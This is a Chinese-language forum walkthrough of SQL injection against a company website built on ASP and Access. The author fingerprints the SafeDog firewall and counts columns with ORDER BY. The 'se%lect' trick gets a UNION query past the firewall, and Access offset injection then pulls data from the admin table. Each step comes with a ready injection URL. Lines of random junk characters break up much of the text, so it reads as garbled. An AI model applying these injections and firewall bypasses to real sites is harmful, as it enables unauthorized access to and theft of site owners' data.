打开网站,一个企业站。
- _" _7 U3 q1 q, V. M7 V
# A& L, l9 V. W1 q) G @; T
) v0 V4 A$ b% C, C7 O, ~7 T e顺手加个admin
! |; Y2 f* o, y- V x# ]9 p2 X7 @7 B4 P7 l. h2 _
# v0 M1 B0 [) G默认后台。
# M" w% Q3 x) U4 A% E回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。9 p2 j2 y) |5 L' [2 Q. r
$ X6 K6 ?# P! t' u% c
+ X" }3 ^) Y: p" w% b) Q+ o) @ E
8 w) w) P3 O. _所以就不用御剑扫了,待会直接封IP。. }& a* H1 i8 A; [ u- Y1 [
' e' V7 t2 t2 f! ]( D0 p( E& X6 [3 b
用order by语句判断是否存在注入。$ Z% U K- k$ D. N$ {. A
http://www.xxx.com /product_show.asp?id=997 order by 1* F9 b6 Y: x$ R' r% Q9 K& j
http://www.xxx.com /product_show.asp?id=997 order by 100
1 J- A, M: u1 P4 S现在存在注入,经测试后发现是9个字段。. p, ?& x W5 [3 j x# B+ ~
" D/ o+ v$ K, m( P4 ` j接下来进行联合查询,猜是否存在admin表。
& C% R% H0 u8 o: D5 Y0 ehttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
( U! F* G2 @# _3 Z# ]
7 \' e6 f( s: q* b$ d
# n* s# [1 [$ ~; Y+ I9 ~ [3 }
9 F( `, V, K& Z在select中间加个%,se%lect绕过安全狗。( X* M n! p3 I% A
W& _- F1 {' r% ?; r v }& ^$ X) Q2 ^: r. h6 q
发现存在admin表,然后开始手工猜常用的字段。
0 e6 H6 Y, i+ @. I7 E. U& p" B# j纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。) C, }0 S9 M4 n& \
: ~( {% p% l# m/ d' k9 F6 V突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
, P6 `# Q+ X0 @* i, G
0 _% N! \ @0 u3 T: Z; }/ c科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
/ r' l4 Z3 V$ d) E# ahttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin4 i4 e1 z) t7 l3 H7 ^0 Q
好了,敏感内容出显了。( L v7 D/ i- d' c3 D
# I# w5 K" e" y4 y5 ^" y: x: x3 o8 M& j5 \
7 ^( g! G, G0 N2 }3 D, M
|